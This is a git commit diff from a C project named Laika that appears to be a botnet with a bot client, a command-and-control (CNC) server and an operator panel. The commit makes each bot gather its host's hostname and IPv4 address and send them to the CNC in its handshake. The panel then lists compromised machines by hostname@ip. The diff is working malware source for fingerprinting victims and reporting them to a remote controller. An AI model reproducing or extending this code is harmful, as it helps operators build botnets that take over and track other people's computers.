mirror of
https://github.com/CPunch/Laika.git
synced 2024-11-22 04:50:06 +00:00
Added hostname, ip info to handshake
- Panel now lists bots by hostname & ip instead of public key
This commit is contained in:
parent
fb71dfb3c3
commit
c21be8dfee
@ -21,6 +21,8 @@ PeerPktHandler laikaB_handlerTbl[LAIKAPKT_MAXNONE] = {
|
|||||||
|
|
||||||
struct sLaika_bot *laikaB_newBot(void) {
|
struct sLaika_bot *laikaB_newBot(void) {
|
||||||
struct sLaika_bot *bot = laikaM_malloc(sizeof(struct sLaika_bot));
|
struct sLaika_bot *bot = laikaM_malloc(sizeof(struct sLaika_bot));
|
||||||
|
struct hostent *host;
|
||||||
|
char *tempIPBuf;
|
||||||
size_t _unused;
|
size_t _unused;
|
||||||
|
|
||||||
laikaP_initPList(&bot->pList);
|
laikaP_initPList(&bot->pList);
|
||||||
@ -48,6 +50,24 @@ struct sLaika_bot *laikaB_newBot(void) {
|
|||||||
LAIKA_ERROR("Failed to init cnc public key!\n");
|
LAIKA_ERROR("Failed to init cnc public key!\n");
|
||||||
}
|
}
|
||||||
|
|
||||||
|
/* grab hostname & ip info */
|
||||||
|
if (SOCKETERROR(gethostname(bot->peer->hostname, LAIKA_HOSTNAME_LEN))) {
|
||||||
|
laikaB_freeBot(bot);
|
||||||
|
LAIKA_ERROR("gethostname() failed!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
if ((host = gethostbyname(bot->peer->hostname)) == NULL) {
|
||||||
|
laikaB_freeBot(bot);
|
||||||
|
LAIKA_ERROR("gethostbyname() failed!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
if ((tempIPBuf = inet_ntoa(*((struct in_addr*)host->h_addr_list[0]))) == NULL) {
|
||||||
|
laikaB_freeBot(bot);
|
||||||
|
LAIKA_ERROR("inet_ntoa() failed!\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
/* copy ipv4 address info */
|
||||||
|
strcpy(bot->peer->ipv4, tempIPBuf);
|
||||||
return bot;
|
return bot;
|
||||||
}
|
}
|
||||||
|
|
||||||
@ -72,7 +92,9 @@ void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) {
|
|||||||
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
|
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
|
||||||
laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
|
laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
|
||||||
laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */
|
laikaS_write(sock, bot->pub, sizeof(bot->pub)); /* write public key */
|
||||||
laikaS_endOutPacket(bot->peer); /* force packet body to be plaintext */
|
laikaS_write(sock, bot->peer->hostname, LAIKA_HOSTNAME_LEN);
|
||||||
|
laikaS_write(sock, bot->peer->ipv4, LAIKA_IPV4_LEN);
|
||||||
|
laikaS_endOutPacket(bot->peer);
|
||||||
laikaS_setSecure(bot->peer, true); /* after the cnc receives our handshake, our packets will be encrypted */
|
laikaS_setSecure(bot->peer, true); /* after the cnc receives our handshake, our packets will be encrypted */
|
||||||
|
|
||||||
if (crypto_kx_client_session_keys(bot->peer->inKey, bot->peer->outKey, bot->pub, bot->priv, bot->peer->peerPub) != 0)
|
if (crypto_kx_client_session_keys(bot->peer->inKey, bot->peer->outKey, bot->pub, bot->priv, bot->peer->peerPub) != 0)
|
||||||
|
@ -7,7 +7,7 @@
|
|||||||
#include "cnc.h"
|
#include "cnc.h"
|
||||||
|
|
||||||
LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
LAIKAPKT_SIZE laikaC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
||||||
[LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + crypto_kx_PUBLICKEYBYTES,
|
[LAIKAPKT_HANDSHAKE_REQ] = LAIKA_MAGICLEN + sizeof(uint8_t) + sizeof(uint8_t) + crypto_kx_PUBLICKEYBYTES + LAIKA_HOSTNAME_LEN + LAIKA_IPV4_LEN,
|
||||||
[LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ] = sizeof(uint8_t),
|
[LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ] = sizeof(uint8_t),
|
||||||
};
|
};
|
||||||
|
|
||||||
@ -29,6 +29,14 @@ void laikaC_handleHandshakeRequest(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, v
|
|||||||
/* read peer's public key */
|
/* read peer's public key */
|
||||||
laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub));
|
laikaS_read(&peer->sock, peer->peerPub, sizeof(peer->peerPub));
|
||||||
|
|
||||||
|
/* read hostname & ipv4 */
|
||||||
|
laikaS_read(&peer->sock, peer->hostname, LAIKA_HOSTNAME_LEN);
|
||||||
|
laikaS_read(&peer->sock, peer->ipv4, LAIKA_IPV4_LEN);
|
||||||
|
|
||||||
|
/* restore null-terminator */
|
||||||
|
peer->hostname[LAIKA_HOSTNAME_LEN-1] = 0;
|
||||||
|
peer->ipv4[LAIKA_IPV4_LEN-1] = 0;
|
||||||
|
|
||||||
/* gen session keys */
|
/* gen session keys */
|
||||||
if (crypto_kx_server_session_keys(peer->inKey, peer->outKey, cnc->pub, cnc->priv, peer->peerPub) != 0)
|
if (crypto_kx_server_session_keys(peer->inKey, peer->outKey, cnc->pub, cnc->priv, peer->peerPub) != 0)
|
||||||
LAIKA_ERROR("failed to gen session key!\n")
|
LAIKA_ERROR("failed to gen session key!\n")
|
||||||
@ -101,7 +109,6 @@ void laikaC_onAddPeer(struct sLaika_cnc *cnc, struct sLaika_peer *peer) {
|
|||||||
|
|
||||||
/* notify connected panels of the newly connected peer */
|
/* notify connected panels of the newly connected peer */
|
||||||
for (i = 0; i < cnc->panelCount; i++) {
|
for (i = 0; i < cnc->panelCount; i++) {
|
||||||
LAIKA_DEBUG("sending new peer to %lx\n", peer);
|
|
||||||
laikaC_sendNewPeer(cnc->panels[i], peer);
|
laikaC_sendNewPeer(cnc->panels[i], peer);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
@ -21,22 +21,24 @@ bool sendPanelPeerIter(struct sLaika_socket *sock, void *uData) {
|
|||||||
return true;
|
return true;
|
||||||
}
|
}
|
||||||
|
|
||||||
void laikaC_sendNewPeer(struct sLaika_peer *panel, struct sLaika_peer *bot) {
|
void laikaC_sendNewPeer(struct sLaika_peer *panel, struct sLaika_peer *peer) {
|
||||||
laikaS_startOutPacket(panel, LAIKAPKT_AUTHENTICATED_ADD_PEER);
|
laikaS_startOutPacket(panel, LAIKAPKT_AUTHENTICATED_ADD_PEER);
|
||||||
|
|
||||||
/* write the bot's pubkey & peerType */
|
/* write the peer's info */
|
||||||
laikaS_write(&panel->sock, bot->peerPub, sizeof(bot->peerPub));
|
laikaS_write(&panel->sock, peer->peerPub, sizeof(peer->peerPub));
|
||||||
laikaS_writeByte(&panel->sock, bot->type);
|
laikaS_write(&panel->sock, peer->hostname, LAIKA_HOSTNAME_LEN);
|
||||||
|
laikaS_write(&panel->sock, peer->ipv4, LAIKA_IPV4_LEN);
|
||||||
|
laikaS_writeByte(&panel->sock, peer->type);
|
||||||
|
|
||||||
laikaS_endOutPacket(panel);
|
laikaS_endOutPacket(panel);
|
||||||
}
|
}
|
||||||
|
|
||||||
void laikaC_sendRmvPeer(struct sLaika_peer *panel, struct sLaika_peer *bot) {
|
void laikaC_sendRmvPeer(struct sLaika_peer *panel, struct sLaika_peer *peer) {
|
||||||
laikaS_startOutPacket(panel, LAIKAPKT_AUTHENTICATED_RMV_PEER);
|
laikaS_startOutPacket(panel, LAIKAPKT_AUTHENTICATED_RMV_PEER);
|
||||||
|
|
||||||
/* write the bot's pubkey */
|
/* write the peer's pubkey */
|
||||||
laikaS_write(&panel->sock, bot->peerPub, sizeof(bot->peerPub));
|
laikaS_write(&panel->sock, peer->peerPub, sizeof(peer->peerPub));
|
||||||
laikaS_writeByte(&panel->sock, bot->type);
|
laikaS_writeByte(&panel->sock, peer->type);
|
||||||
|
|
||||||
laikaS_endOutPacket(panel);
|
laikaS_endOutPacket(panel);
|
||||||
}
|
}
|
||||||
|
@ -6,6 +6,9 @@
|
|||||||
|
|
||||||
#define LAIKA_MAX_PKTSIZE 4096
|
#define LAIKA_MAX_PKTSIZE 4096
|
||||||
|
|
||||||
|
#define LAIKA_HOSTNAME_LEN 64
|
||||||
|
#define LAIKA_IPV4_LEN 16
|
||||||
|
|
||||||
/* NONCE: randomly generated uint8_t[LAIKA_NONCESIZE] */
|
/* NONCE: randomly generated uint8_t[LAIKA_NONCESIZE] */
|
||||||
|
|
||||||
/* first handshake between peer & cnc works as so:
|
/* first handshake between peer & cnc works as so:
|
||||||
@ -22,6 +25,8 @@ enum {
|
|||||||
* uint8_t majorVer;
|
* uint8_t majorVer;
|
||||||
* uint8_t minorVer;
|
* uint8_t minorVer;
|
||||||
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
|
||||||
|
* char hostname[LAIKA_HOSTNAME_LEN];
|
||||||
|
* char ipv4[LAIKA_IPV4_LEN];
|
||||||
*/
|
*/
|
||||||
LAIKAPKT_HANDSHAKE_RES,
|
LAIKAPKT_HANDSHAKE_RES,
|
||||||
/* layout of LAIKAPKT_HANDSHAKE_RES:
|
/* layout of LAIKAPKT_HANDSHAKE_RES:
|
||||||
@ -34,8 +39,9 @@ enum {
|
|||||||
LAIKAPKT_AUTHENTICATED_ADD_PEER, /* notification that a peer has connected to the cnc */
|
LAIKAPKT_AUTHENTICATED_ADD_PEER, /* notification that a peer has connected to the cnc */
|
||||||
/* layout of LAIKAPKT_AUTHENTICATED_ADD_PEER
|
/* layout of LAIKAPKT_AUTHENTICATED_ADD_PEER
|
||||||
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
* uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- pubkey of said bot
|
||||||
|
* char hostname[LAIKA_HOSTNAME_LEN];
|
||||||
|
* char ipv4[LAIKA_IPV4_LEN];
|
||||||
* uint8_t peerType;
|
* uint8_t peerType;
|
||||||
* -- reserved info later (machine info including hostname, OS, machineType, ip, etc.)
|
|
||||||
*/
|
*/
|
||||||
LAIKAPKT_AUTHENTICATED_RMV_PEER, /* notification that a peer has disconnected from the cnc */
|
LAIKAPKT_AUTHENTICATED_RMV_PEER, /* notification that a peer has disconnected from the cnc */
|
||||||
/* layout of LAIKAPKT_AUTHENTICATED_RMV_PEER
|
/* layout of LAIKAPKT_AUTHENTICATED_RMV_PEER
|
||||||
|
@ -21,6 +21,7 @@ struct sLaika_peer {
|
|||||||
struct sLaika_socket sock; /* DO NOT MOVE THIS. this member HAS TO BE FIRST so that typecasting sLaika_peer* to sLaika_sock* works as intended */
|
struct sLaika_socket sock; /* DO NOT MOVE THIS. this member HAS TO BE FIRST so that typecasting sLaika_peer* to sLaika_sock* works as intended */
|
||||||
uint8_t peerPub[crypto_kx_PUBLICKEYBYTES]; /* connected peer's public key */
|
uint8_t peerPub[crypto_kx_PUBLICKEYBYTES]; /* connected peer's public key */
|
||||||
uint8_t inKey[crypto_kx_SESSIONKEYBYTES], outKey[crypto_kx_SESSIONKEYBYTES];
|
uint8_t inKey[crypto_kx_SESSIONKEYBYTES], outKey[crypto_kx_SESSIONKEYBYTES];
|
||||||
|
char hostname[LAIKA_HOSTNAME_LEN], ipv4[LAIKA_IPV4_LEN];
|
||||||
struct sLaika_pollList *pList; /* pollList we're activeList in */
|
struct sLaika_pollList *pList; /* pollList we're activeList in */
|
||||||
PeerPktHandler *handlers;
|
PeerPktHandler *handlers;
|
||||||
LAIKAPKT_SIZE *pktSizeTable; /* const table to pull pkt size data from */
|
LAIKAPKT_SIZE *pktSizeTable; /* const table to pull pkt size data from */
|
||||||
|
@ -87,6 +87,7 @@ void laikaS_acceptFrom(struct sLaika_socket *sock, struct sLaika_socket *from);
|
|||||||
bool laikaS_setNonBlock(struct sLaika_socket *sock);
|
bool laikaS_setNonBlock(struct sLaika_socket *sock);
|
||||||
|
|
||||||
void laikaS_consumeRead(struct sLaika_socket *sock, size_t sz); /* throws sz bytes away from the inBuf */
|
void laikaS_consumeRead(struct sLaika_socket *sock, size_t sz); /* throws sz bytes away from the inBuf */
|
||||||
|
void laikaS_zeroWrite(struct sLaika_socket *sock, size_t sz); /* writes sz NULL bytes to the outBuf */
|
||||||
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */
|
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz); /* reads from inBuf */
|
||||||
void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */
|
void laikaS_write(struct sLaika_socket *sock, void *buf, size_t sz); /* writes to outBuf */
|
||||||
void laikaS_writeKeyEncrypt(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub); /* encrypts & writes from buf using pub key */
|
void laikaS_writeKeyEncrypt(struct sLaika_socket *sock, void *buf, size_t sz, uint8_t *pub); /* encrypts & writes from buf using pub key */
|
||||||
|
@ -17,6 +17,9 @@ struct sLaika_peer *laikaS_newPeer(PeerPktHandler *handlers, LAIKAPKT_SIZE *pktS
|
|||||||
peer->outStart = -1;
|
peer->outStart = -1;
|
||||||
peer->inStart = -1;
|
peer->inStart = -1;
|
||||||
peer->useSecure = false;
|
peer->useSecure = false;
|
||||||
|
|
||||||
|
memset(peer->hostname, 0, LAIKA_HOSTNAME_LEN);
|
||||||
|
memset(peer->ipv4, 0, LAIKA_IPV4_LEN);
|
||||||
return peer;
|
return peer;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -176,6 +176,14 @@ void laikaS_consumeRead(struct sLaika_socket *sock, size_t sz) {
|
|||||||
laikaM_rmvarray(sock->inBuf, sock->inCount, 0, sz);
|
laikaM_rmvarray(sock->inBuf, sock->inCount, 0, sz);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
void laikaS_zeroWrite(struct sLaika_socket *sock, size_t sz) {
|
||||||
|
laikaM_growarray(uint8_t, sock->outBuf, sz, sock->outCount, sock->outCap);
|
||||||
|
|
||||||
|
/* set NULL bytes */
|
||||||
|
memset(&sock->outBuf[sock->outCount], 0, sz);
|
||||||
|
sock->outCount += sz;
|
||||||
|
}
|
||||||
|
|
||||||
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz) {
|
void laikaS_read(struct sLaika_socket *sock, void *buf, size_t sz) {
|
||||||
memcpy(buf, sock->inBuf, sz);
|
memcpy(buf, sock->inBuf, sz);
|
||||||
laikaM_rmvarray(sock->inBuf, sock->inCount, 0, sz);
|
laikaM_rmvarray(sock->inBuf, sock->inCount, 0, sz);
|
||||||
|
@ -9,12 +9,13 @@
|
|||||||
|
|
||||||
typedef struct sPanel_bot {
|
typedef struct sPanel_bot {
|
||||||
uint8_t pub[crypto_kx_PUBLICKEYBYTES];
|
uint8_t pub[crypto_kx_PUBLICKEYBYTES];
|
||||||
|
char hostname[LAIKA_HOSTNAME_LEN], ipv4[LAIKA_IPV4_LEN];
|
||||||
PEERTYPE type;
|
PEERTYPE type;
|
||||||
tPanel_listItem *item;
|
tPanel_listItem *item;
|
||||||
char *name; /* heap allocated string */
|
char *name; /* heap allocated string */
|
||||||
} tPanel_bot;
|
} tPanel_bot;
|
||||||
|
|
||||||
tPanel_bot *panelB_newBot(uint8_t *pubKey);
|
tPanel_bot *panelB_newBot(uint8_t *pubKey, char *hostname, char *ipv4);
|
||||||
void panelB_freeBot(tPanel_bot *bot);
|
void panelB_freeBot(tPanel_bot *bot);
|
||||||
|
|
||||||
/* search connected bots by public key */
|
/* search connected bots by public key */
|
||||||
|
@ -23,6 +23,7 @@ void connectToCNC(void *uData) {
|
|||||||
panel_botList = panelL_newList();
|
panel_botList = panelL_newList();
|
||||||
|
|
||||||
/* init tabs */
|
/* init tabs */
|
||||||
|
panelL_newListItem(&panel_tabList->list, NULL, "CNC Flags", NULL, NULL);
|
||||||
panelL_newListItem(&panel_tabList->list, panel_botList, "Bot List", NULL, NULL);
|
panelL_newListItem(&panel_tabList->list, panel_botList, "Bot List", NULL, NULL);
|
||||||
panelL_init(&panel_tabList->list);
|
panelL_init(&panel_tabList->list);
|
||||||
panelL_init(panel_botList);
|
panelL_init(panel_botList);
|
||||||
|
@ -4,15 +4,26 @@
|
|||||||
|
|
||||||
#include "panel.h"
|
#include "panel.h"
|
||||||
|
|
||||||
tPanel_bot *panelB_newBot(uint8_t *pubKey) {
|
tPanel_bot *panelB_newBot(uint8_t *pubKey, char *hostname, char *ipv4) {
|
||||||
tPanel_bot *bot = laikaM_malloc(sizeof(tPanel_bot));
|
tPanel_bot *bot = laikaM_malloc(sizeof(tPanel_bot));
|
||||||
bot->name = laikaM_malloc(256);
|
int length;
|
||||||
|
|
||||||
sodium_bin2hex(bot->name, 256, pubKey, crypto_kx_PUBLICKEYBYTES);
|
|
||||||
|
|
||||||
/* copy pubKey to bot's pubKey */
|
/* copy pubKey to bot's pubKey */
|
||||||
memcpy(bot->pub, pubKey, crypto_kx_PUBLICKEYBYTES);
|
memcpy(bot->pub, pubKey, crypto_kx_PUBLICKEYBYTES);
|
||||||
|
|
||||||
|
/* copy hostname & ipv4 */
|
||||||
|
memcpy(bot->hostname, hostname, LAIKA_HOSTNAME_LEN);
|
||||||
|
memcpy(bot->ipv4, ipv4, LAIKA_IPV4_LEN);
|
||||||
|
|
||||||
|
/* restore NULL terminators */
|
||||||
|
bot->hostname[LAIKA_HOSTNAME_LEN-1] = 0;
|
||||||
|
bot->ipv4[LAIKA_IPV4_LEN-1] = 0;
|
||||||
|
|
||||||
|
/* make bot name */
|
||||||
|
length = strlen(bot->hostname) + 1 + strlen(bot->ipv4) + 1;
|
||||||
|
bot->name = laikaM_malloc(length);
|
||||||
|
sprintf(bot->name, "%s@%s", bot->hostname, bot->ipv4);
|
||||||
|
|
||||||
return bot;
|
return bot;
|
||||||
}
|
}
|
||||||
|
|
||||||
|
@ -11,19 +11,24 @@ void handleHandshakeResponse(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *u
|
|||||||
}
|
}
|
||||||
|
|
||||||
void handleAddPeer(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
|
void handleAddPeer(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
|
||||||
|
char hostname[LAIKA_HOSTNAME_LEN], ipv4[LAIKA_IPV4_LEN];
|
||||||
uint8_t pubKey[crypto_kx_PUBLICKEYBYTES];
|
uint8_t pubKey[crypto_kx_PUBLICKEYBYTES];
|
||||||
uint8_t type;
|
uint8_t type;
|
||||||
|
|
||||||
/* read newly connected peer's pubKey */
|
/* read newly connected peer's pubKey */
|
||||||
laikaS_read(&peer->sock, pubKey, crypto_kx_PUBLICKEYBYTES);
|
laikaS_read(&peer->sock, pubKey, crypto_kx_PUBLICKEYBYTES);
|
||||||
|
|
||||||
|
/* read hostname & ipv4 */
|
||||||
|
laikaS_read(&peer->sock, hostname, LAIKA_HOSTNAME_LEN);
|
||||||
|
laikaS_read(&peer->sock, ipv4, LAIKA_IPV4_LEN);
|
||||||
|
|
||||||
/* read peer's peerType */
|
/* read peer's peerType */
|
||||||
type = laikaS_readByte(&peer->sock);
|
type = laikaS_readByte(&peer->sock);
|
||||||
|
|
||||||
/* add peer */
|
/* add peer */
|
||||||
switch (type) {
|
switch (type) {
|
||||||
case PEER_BOT: {
|
case PEER_BOT: {
|
||||||
tPanel_bot *bot = panelB_newBot(pubKey);
|
tPanel_bot *bot = panelB_newBot(pubKey, hostname, ipv4);
|
||||||
panelC_addBot(bot);
|
panelC_addBot(bot);
|
||||||
break;
|
break;
|
||||||
}
|
}
|
||||||
@ -57,7 +62,7 @@ void handleRmvPeer(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) {
|
|||||||
|
|
||||||
LAIKAPKT_SIZE panelC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
LAIKAPKT_SIZE panelC_pktSizeTbl[LAIKAPKT_MAXNONE] = {
|
||||||
[LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t),
|
[LAIKAPKT_HANDSHAKE_RES] = sizeof(uint8_t),
|
||||||
[LAIKAPKT_AUTHENTICATED_ADD_PEER] = crypto_kx_PUBLICKEYBYTES + sizeof(uint8_t), /* pubkey + peerType */
|
[LAIKAPKT_AUTHENTICATED_ADD_PEER] = crypto_kx_PUBLICKEYBYTES + sizeof(uint8_t) + LAIKA_HOSTNAME_LEN + LAIKA_IPV4_LEN, /* pubkey + peerType + host + ip */
|
||||||
[LAIKAPKT_AUTHENTICATED_RMV_PEER] = crypto_kx_PUBLICKEYBYTES + sizeof(uint8_t), /* pubkey + peerType */
|
[LAIKAPKT_AUTHENTICATED_RMV_PEER] = crypto_kx_PUBLICKEYBYTES + sizeof(uint8_t), /* pubkey + peerType */
|
||||||
};
|
};
|
||||||
|
|
||||||
@ -125,6 +130,10 @@ void panelC_connectToCNC(tPanel_client *client, char *ip, char *port) {
|
|||||||
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
|
laikaS_writeByte(sock, LAIKA_VERSION_MAJOR);
|
||||||
laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
|
laikaS_writeByte(sock, LAIKA_VERSION_MINOR);
|
||||||
laikaS_write(sock, client->pub, sizeof(client->pub)); /* write public key */
|
laikaS_write(sock, client->pub, sizeof(client->pub)); /* write public key */
|
||||||
|
|
||||||
|
/* write stub hostname & ipv4 (since we're a panel/dummy client, cnc doesn't need this information really) */
|
||||||
|
laikaS_zeroWrite(sock, LAIKA_HOSTNAME_LEN);
|
||||||
|
laikaS_zeroWrite(sock, LAIKA_IPV4_LEN);
|
||||||
laikaS_endOutPacket(client->peer);
|
laikaS_endOutPacket(client->peer);
|
||||||
laikaS_setSecure(client->peer, true);
|
laikaS_setSecure(client->peer, true);
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user